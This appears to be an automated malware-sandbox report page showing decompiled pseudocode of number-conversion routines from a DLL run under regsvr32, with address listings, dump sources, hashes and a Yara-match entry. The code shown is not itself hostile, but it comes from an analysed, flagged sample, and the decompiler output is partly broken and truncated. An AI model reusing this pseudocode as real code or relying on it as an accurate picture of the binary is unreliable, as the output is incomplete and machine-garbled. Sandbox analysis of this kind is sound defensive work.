                                                                              			E1004EFDE(void* __ebx, signed int __ebp, void* __rdx, long long __r8, void* __r11, long long* __r13, signed int _a48, signed int _a52, signed int _a56, long long _a64, signed int* _a72, unsigned int _a80, signed short _a82, signed int _a84, signed int _a86, signed int _a88, signed int _a90, signed int _a96, signed int _a98, signed int _a100, signed int _a102, unsigned int _a104, signed int _a106, unsigned int _a112, signed int _a114, char _a128, signed int _a151, signed int _a160, void* _a184, void* _a192, void* _a200, void* _a208, void* _a216, void* _a224, void* _a232, void* _a240, intOrPtr _a288, intOrPtr _a296) {
				unsigned int _t141;
				signed int _t142;
				signed short _t152;
				signed short _t153;
				signed short _t157;
				signed short _t158;
				signed int _t159;
				signed int _t163;
				signed int _t165;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed char _t182;
				void* _t183;
				signed int _t184;
				signed int _t186;
				signed short _t187;
				signed short _t188;
				signed int _t190;
				signed int _t194;
				void* _t195;
				signed int _t197;
				signed short _t201;
				signed int _t202;
				signed int _t205;
				void* _t206;
				signed int _t207;
				signed int _t210;
				signed int _t211;
				void* _t219;
				signed long long _t226;
				void* _t227;
				void* _t228;
				long long _t230;
				signed int* _t231;
				long long _t233;
				void* _t235;
				signed long long _t238;
				void* _t242;
				signed int* _t243;
				void* _t244;
				signed int _t245;
				void* _t246;
				char* _t247;
				signed short* _t248;
				long long* _t250;
				signed int* _t253;

				_t250 = __r13;
				_t246 = __r11;
				_t240 = __r8;
				_t228 = __rdx;
				_t211 = __ebp;
				_t183 = __ebx;
				_t233 = __r8 - 2;
				if(__rdx - 0x31 > 8) {
					__eflags = _t195 - 0x2b;
					if(_t195 == 0x2b) {
						r9d = 7;
						goto L1;
					}
					__eflags = _t195 - 0x2d;
					if(_t195 == 0x2d) {
						r9d = 7;
						r14d = _t242 - 8;
						goto L1;
					}
					__eflags = _t195 - 0x30;
					if(_t195 != 0x30) {
						_t240 = _t233;
						_t205 = 0;
						goto L12;
					}
					r9d = 8;
				} else {
					r9d = 9;
					_t240 = __r8 - 1;
					do {
						goto L1;
					} while (r9d != 0xa);
					_t205 = 0;
					__eflags = 0;
					L12:
					__eflags = _t211;
					 *_t250 = _t240;
					if(_t211 == 0) {
						r8d = _t205;
						_t197 = _t205;
						_t205 = 4;
						L106:
						_t186 = 0;
						_t141 = 0;
						__eflags = 0;
						L107:
						_t243 = _a72;
						_t142 = _t141 | _a52;
						__eflags = _t142;
						_t243[2] = _t142;
						 *_t243 = _t186;
						_t243[0] = _t197;
						_t243[1] = r8d;
						__eflags = _a160 ^ _t238;
						return E10038D20(_t186, _a160 ^ _t238);
					}
					__eflags = r10d - 0x18;
					if(r10d <= 0x18) {
						__eflags = r10d;
						if(r10d == 0) {
							r8d = _t205;
							_t197 = _t205;
							goto L106;
						}
						L19:
						_t247 = _t246 - 1;
						__eflags =  *_t247;
						if( *_t247 != 0) {
							L22:
							_t14 =  &_a96; // 0x61
							_t15 =  &_a128; // 0x81
							E10052690(r10d, _t219, _t15, _t228, _t233, _t235, _t14, _t242, _t244, _t247);
							__eflags = r14d;
							if(r14d >= 0) {
								r8d = _a48;
							} else {
								r8d = _a48;
								r8d =  ~r8d;
							}
							r8d = r8d + _t183;
							__eflags = r12d;
							if(r12d == 0) {
								r8d = r8d + _a288;
								__eflags = r8d;
							}
							__eflags = r15d;
							if(r15d == 0) {
								r8d = r8d - _a296;
								__eflags = r8d;
							}
							__eflags = r8d - 0x1450;
							if(r8d > 0x1450) {
								_t197 = _t205;
								_t141 = 0x7fff;
								r8d = 0x80000000;
								_t205 = 2;
								_t186 = 0;
								goto L107;
							} else {
								__eflags = r8d - 0xffffebb0;
								if(r8d < 0xffffebb0) {
									r8d = _t205;
									_t197 = _t205;
									_t205 = 1;
									goto L106;
								}
								_t230 = 0x10070ac0;
								__eflags = r8d;
								if(r8d == 0) {
									L101:
									_t186 = _a96 & 0x0000ffff;
									_t197 = _a98;
									r8d = _a102;
									_t141 = _a104 >> 0x10;
									goto L107;
								}
								__eflags = r8d;
								if(r8d < 0) {
									r8d =  ~r8d;
									_t230 = 0x10070c20;
									__eflags = 0x10070c80;
								}
								__eflags = _a56;
								_t148 =  ==  ? 0 : _a96 & 0x0000ffff;
								__eflags = r8d;
								_a96 =  ==  ? 0 : _a96 & 0x0000ffff;
								if(r8d == 0) {
									_t205 = 0;
									__eflags = 0;
								} else {
									r9d = 0xffff8000;
									do {
										_t230 = _t230 + 0x54;
										r8d = r8d >> 3;
										__eflags = r8d & 0x00000007;
										_a48 = r8d;
										_a64 = _t230;
										if((r8d & 0x00000007) == 0) {
											goto L98;
										}
										_t226 = _t215 + _t215 * 2;
										__eflags =  *((short*)(_t230 + _t226 * 4)) - 0x8000;
										_t253 = _t230 + _t226 * 4;
										if( *((short*)(_t230 + _t226 * 4)) >= 0x8000) {
											_t31 =  &_a112; // 0x71
											_t226 = _t31;
											 *_t226 =  *_t253;
											_t179 = _t253[2];
											_t33 =  &_a112; // 0x71
											_t253 = _t33;
											 *(_t226 + 8) = _t179;
											_t215 = _a112 >> 0x10;
											_t180 = _t179 - 1;
											__eflags = _t180;
											_a114 = _t180;
										}
										_t187 = _t253[2] & 0x0000ffff;
										_t152 = _a106 & 0x0000ffff;
										r15d = 0;
										_t188 = _t187 & 0x00007fff;
										_a80 = 0;
										_t153 = _t152 & 0x00007fff;
										_a84 = 0;
										_t201 = (_t187 & 0x0000ffff ^ _t152) & 0x00008000;
										__eflags = _t153 - 0x7fff;
										_a88 = 0;
										_a56 = _t201;
										_t206 = _t215 + _t226;
										if(_t153 >= 0x7fff) {
											L97:
											__eflags = _t201;
											_t230 = _a64;
											_t155 =  !=  ? r9d : 0x7fff8000;
											__eflags = 0x7fff8000;
											_a100 = 0;
											_a96 = 0;
											_a104 =  !=  ? r9d : 0x7fff8000;
										} else {
											__eflags = _t188 - 0x7fff;
											if(_t188 >= 0x7fff) {
												goto L97;
											}
											__eflags = _t206 - 0xbffd;
											if(_t206 > 0xbffd) {
												goto L97;
											}
											__eflags = _t206 - 0x3fbf;
											if(_t206 > 0x3fbf) {
												__eflags = _t153;
												if(_t153 != 0) {
													L49:
													__eflags = _t188;
													if(_t188 != 0) {
														L54:
														r13d = 0;
														_t231 =  &_a84;
														r12d = 5;
														do {
															__eflags = r12d;
															_t184 = r12d;
															_t227 = _t250 + _t250;
															if(r12d <= 0) {
																goto L69;
															}
															_t61 =  &(_t253[2]); // 0x9
															_t245 = _t61;
															_t63 = _t227 + 0x60; // 0x65
															_t248 = _t238 + _t63;
															_t210 = r13d & 0x00000001;
															__eflags = _t210;
															do {
																_t190 = ( *_t248 & 0x0000ffff) * ( *_t245 & 0x0000ffff);
																__eflags = _t210;
																if(_t210 == 0) {
																	r8d = 0;
																	r9d = _t215 + _t227;
																	__eflags = r9d -  *(_t231 - 4);
																	if(r9d <  *(_t231 - 4)) {
																		L64:
																		r8d = 1;
																		L65:
																		 *(_t231 - 4) = r9d;
																		goto L66;
																	}
																	__eflags = r9d - _t190;
																	if(r9d >= _t190) {
																		goto L65;
																	}
																	goto L64;
																}
																r8d = 0;
																r9d = _t215 + _t227;
																__eflags = r9d -  *(_t231 - 4);
																if(r9d <  *(_t231 - 4)) {
																	L60:
																	r8d = 1;
																	L61:
																	 *(_t231 - 4) = r9d;
																	goto L66;
																}
																__eflags = r9d - _t190;
																if(r9d >= _t190) {
																	goto L61;
																}
																goto L60;
																L66:
																__eflags = r8d;
																if(r8d != 0) {
																	 *_t231 =  *_t231 + 1;
																	__eflags =  *_t231;
																}
																_t184 = _t184 - 1;
																_t248 =  &(_t248[1]);
																_t245 = _t245 - 2;
																__eflags = _t184;
															} while (_t184 > 0);
															L69:
															r12d = r12d - 1;
															_t231 =  &(_t231[0]);
															r13d = r13d + 1;
															__eflags = r12d;
														} while (r12d > 0);
														_t207 = _t206 + 0xc002;
														__eflags = _t207;
														if(__eflags <= 0) {
															r8d = _a88;
															_t202 = _a84;
															r9d = _a80;
															L84:
															_t207 = _t207 + 0xffff;
															__eflags = _t207;
															if(_t207 >= 0) {
																L76:
																_t157 = _a80 & 0x0000ffff;
																L77:
																__eflags = _t157 - 0x8000;
																if(_t157 > 0x8000) {
																	L79:
																	_t158 = _a82;
																	__eflags = _t158 - 0xffffffff;
																	if(_t158 != 0xffffffff) {
																		_t159 = _t158 + 1;
																		__eflags = _t159;
																		_a82 = _t159;
																		_t202 = _a84;
																	} else {
																		_t163 = _a86;
																		_a82 = 0;
																		__eflags = _t163 - 0xffffffff;
																		if(_t163 != 0xffffffff) {
																			_a86 = _t163 + 1;
																			r8d = _a88;
																			_t202 = _a84;
																		} else {
																			_t165 = _a90 & 0x0000ffff;
																			_a86 = 0;
																			__eflags = _t165 - 0xffff;
																			if(_t165 != 0xffff) {
																				_t202 = _a84;
																				_a90 = _t165 + 1;
																				r8d = _a88;
																			} else {
																				_t202 = _a84;
																				_a90 = 0x8000;
																				r8d = _a88;
																				_t207 = _t207 + 1;
																			}
																		}
																	}
																	L94:
																	__eflags = _t207 - 0x7fff;
																	if(_t207 < 0x7fff) {
																		_a98 = _t202;
																		_t230 = _a64;
																		_a102 = r8d;
																		r8d = _a48;
																		_a96 = _a82 & 0x0000ffff;
																		_a106 = _t207 | _a56;
																		r9d = 0xffff8000;
																	} else {
																		__eflags = _a56;
																		_t230 = _a64;
																		r8d = _a48;
																		r9d = 0xffff8000;
																		_a100 = 0;
																		_t162 =  !=  ? r9d : 0x7fff8000;
																		_a96 = 0;
																		_a104 =  !=  ? r9d : 0x7fff8000;
																	}
																	goto L98;
																}
																r9d = r9d & 0x0001ffff;
																__eflags = r9d - 0x18000;
																if(r9d != 0x18000) {
																	goto L94;
																}
																goto L79;
															}
															r10d =  ~(_t207 & 0x0000ffff) & 0x0000ffff;
															_t207 = _t207 + r10w;
															__eflags = _t207;
															do {
																__eflags = _a80 & 0x00000001;
																if((_a80 & 0x00000001) != 0) {
																	r15d = r15d + 1;
																	__eflags = r15d;
																}
																r9d = r9d >> 1;
																r9d = r9d | _t202 << 0x0000001f;
																r8d = r8d >> 1;
																_t202 = _t202 >> 0x00000001 | r8d << 0x0000001f;
																_t245 = _t245 - 1;
																__eflags = _t245;
																_a80 = r9d;
															} while (_t245 != 0);
															__eflags = r15d;
															_a84 = _t202;
															_a88 = r8d;
															if(r15d == 0) {
																goto L76;
															}
															_t157 = r9w | 0x00000001;
															_a80 = _t157;
															r9d = _a80;
															goto L77;
														}
														r8d = _a88;
														_t202 = _a84;
														r9d = _a80;
														while(1) {
															asm("inc ecx");
															if(__eflags < 0) {
																break;
															}
															r8d = r8d + r8d;
															_t194 = _t202 >> 0x1f;
															r9d = r9d + r9d;
															_t202 = _t202 + _t202 | r9d >> 0x0000001f;
															r8d = r8d | _t194;
															_t207 = _t207 + 0xffff;
															_a84 = _t202;
															_a88 = r8d;
															__eflags = _t207;
															_a80 = r9d;
															if(__eflags > 0) {
																continue;
															}
															goto L84;
														}
														__eflags = _t207;
														if(_t207 <= 0) {
															goto L84;
														}
														goto L76;
													}
													_t206 = _t206 + 1;
													asm("btr eax, 0x1f");
													__eflags = _t253[2];
													if(_t253[2] != 0) {
														goto L54;
													}
													__eflags = _t253[1];
													if(_t253[1] != 0) {
														goto L54;
													}
													__eflags =  *_t253;
													if( *_t253 != 0) {
														goto L54;
													}
													_t230 = _a64;
													_a104 = 0;
													_a100 = 0;
													_a96 = 0;
													goto L98;
												}
												_t206 = _t206 + 1;
												asm("btr eax, 0x1f");
												__eflags = _a104;
												if(_a104 != 0) {
													goto L49;
												}
												__eflags = _a100;
												if(_a100 != 0) {
													goto L49;
												}
												__eflags = _a96;
												if(_a96 != 0) {
													goto L49;
												}
												_t230 = _a64;
												_a106 = 0;
												goto L98;
											}
											_t230 = _a64;
											_a104 = 0;
											_a100 = 0;
											_a96 = 0;
										}
										L98:
										__eflags = r8d;
									} while (r8d != 0);
									_t205 = 0;
								}
								goto L101;
							}
						}
						do {
							_t247 = _t247 - 1;
							r10d = r10d + 0xffffffff;
							_t183 = _t183 + 1;
							__eflags =  *_t247;
						} while ( *_t247 == 0);
						goto L22;
					}
					_t181 = _a151 & 0x000000ff;
					__eflags = _t181 - 5;
					if(_t181 >= 5) {
						_t182 = _t181 + 1;
						__eflags = _t182;
						_a151 = _t182;
					}
					_t246 = _t246 - 1;
					r10d = 0x18;
					_t183 = _t183 + 1;
					goto L19;
				}
				L1:
				_t240 = _t240 + 1;
				if(r9d <= 0xb) {
					_t215 = 0x10000000;
					goto __rcx;
				}
				__eflags = r9d - 0xa;
			}


















































                                                                              0x1004efde
                                                                              0x1004efde
                                                                              0x1004efde
                                                                              0x1004efde
                                                                              0x1004efde
                                                                              0x1004efde
                                                                              0x1004efe1
                                                                              0x1004efe7
                                                                              0x1004efff
                                                                              0x1004f002
                                                                              0x1004f03a
                                                                              0x00000000
                                                                              0x1004f040
                                                                              0x1004f004
                                                                              0x1004f007
                                                                              0x1004f024
                                                                              0x1004f031
                                                                              0x00000000
                                                                              0x1004f031
                                                                              0x1004f009
                                                                              0x1004f00c
                                                                              0x1004f187
                                                                              0x1004f18a
                                                                              0x00000000
                                                                              0x1004f18a
                                                                              0x1004f012
                                                                              0x1004efe9
                                                                              0x1004efe9
                                                                              0x1004efef
                                                                              0x1004ecc0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f11d
                                                                              0x1004f11d
                                                                              0x1004f11f
                                                                              0x1004f11f
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f71b
                                                                              0x1004f71b
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f77b
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f702
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f21c
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f256
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f26d
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27a
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f287
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x00000000
                                                                              0x1004f6e2
                                                                              0x1004f2a8
                                                                              0x1004f2ac
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b5
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2cd
                                                                              0x1004f2d7
                                                                              0x1004f2db
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fb
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f314
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f340
                                                                              0x1004f340
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f370
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f386
                                                                              0x1004f386
                                                                              0x1004f38b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f391
                                                                              0x1004f396
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f135
                                                                              0x1004f13d
                                                                              0x1004f13f
                                                                              0x1004f141
                                                                              0x1004f141
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x00000000
                                                                              0x1004f154
                                                                              0x1004ecc0
                                                                              0x1004ecc4
                                                                              0x1004eccc
                                                                              0x1004ecdc
                                                                              0x1004ece6
                                                                              0x1004ece6
                                                                              0x1004f113

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 48ed2b7ae0e39a11cb2aeffea062b6e518fd540d6d1f67cb34b1d8f2644655d7
                                                                              • Instruction ID: 5e518e196d8376d0455f42d308241fb5fc3928aa4f904cecc2cd2c03014dff68
                                                                              • Opcode Fuzzy Hash: 48ed2b7ae0e39a11cb2aeffea062b6e518fd540d6d1f67cb34b1d8f2644655d7
                                                                              • Instruction Fuzzy Hash: B96125776287D5C6D760CF25E0447AEB7A1F394780FA0412AEA89C3A68DB7DD845CF08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180025E88 Relevance: .2, Instructions: 167COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 636ed3c89b38e63114f2d2672b542ea9429d7597145989221425ac881483aa9e
                                                                              • Instruction ID: 9c3afdfbfdf497047419e96e23ac648a32a0c35cf7c10b77ff2162508d5b9c58
                                                                              • Opcode Fuzzy Hash: 636ed3c89b38e63114f2d2672b542ea9429d7597145989221425ac881483aa9e
                                                                              • Instruction Fuzzy Hash: 68715B70A0460D8FCFA9DF64D0857EE77F2FB48348F109169E856972A2DB74DA18CB84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004EE1D Relevance: .2, Instructions: 165COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E1004EE1D(void* __ebx, signed int __ebp, void* __rdx, void* __r8, void* __r11, long long* __r13, signed int _a48, signed int _a52, signed int _a56, long long _a64, signed int* _a72, unsigned int _a80, signed short _a82, signed int _a84, signed int _a86, signed int _a88, signed int _a90, signed int _a96, signed int _a98, signed int _a100, signed int _a102, unsigned int _a104, signed int _a106, unsigned int _a112, signed int _a114, char _a128, signed int _a151, signed int _a160, void* _a184, void* _a192, void* _a200, void* _a208, void* _a216, void* _a224, void* _a232, void* _a240, intOrPtr _a288, intOrPtr _a296) {
				unsigned int _t139;
				signed int _t140;
				signed short _t150;
				signed short _t151;
				signed short _t155;
				signed short _t156;
				signed int _t157;
				signed int _t161;
				signed int _t163;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed char _t180;
				void* _t181;
				signed int _t182;
				signed int _t183;
				signed short _t184;
				signed short _t185;
				signed int _t187;
				signed int _t191;
				void* _t193;
				signed int _t194;
				signed short _t198;
				signed int _t199;
				signed int _t203;
				void* _t204;
				signed int _t205;
				signed int _t208;
				signed int _t209;
				void* _t218;
				signed long long _t225;
				void* _t226;
				void* _t228;
				long long _t230;
				signed int* _t231;
				long long _t233;
				intOrPtr* _t235;
				signed long long _t238;
				long long _t241;
				void* _t243;
				signed int* _t244;
				void* _t245;
				signed int _t246;
				void* _t247;
				char* _t248;
				signed short* _t249;
				long long* _t251;
				signed int* _t254;

				_t251 = __r13;
				_t247 = __r11;
				_t240 = __r8;
				_t228 = __rdx;
				_t209 = __ebp;
				_t181 = __ebx;
				if(__rdx - 0x31 > 8) {
					_t213 =  *((intOrPtr*)( *((intOrPtr*)( *_t235 + 0x128))));
					__eflags = _t193 -  *_t213;
					if(_t193 !=  *_t213) {
						__eflags = _t193 - 0x30;
						if(_t193 != 0x30) {
							_t241 = _t233;
							_t203 = 0;
							goto L10;
						}
						r9d = 1;
						goto L1;
					}
					r9d = 5;
				} else {
					r9d = 3;
					_t240 = __r8 - 1;
					do {
						goto L1;
					} while (r9d != 0xa);
					_t203 = 0;
					__eflags = 0;
					L10:
					__eflags = _t209;
					 *_t251 = _t241;
					if(_t209 == 0) {
						r8d = _t203;
						_t194 = _t203;
						_t203 = 4;
						L104:
						_t183 = 0;
						_t139 = 0;
						__eflags = 0;
						L105:
						_t244 = _a72;
						_t140 = _t139 | _a52;
						__eflags = _t140;
						_t244[2] = _t140;
						 *_t244 = _t183;
						_t244[0] = _t194;
						_t244[1] = r8d;
						__eflags = _a160 ^ _t238;
						return E10038D20(_t183, _a160 ^ _t238);
					}
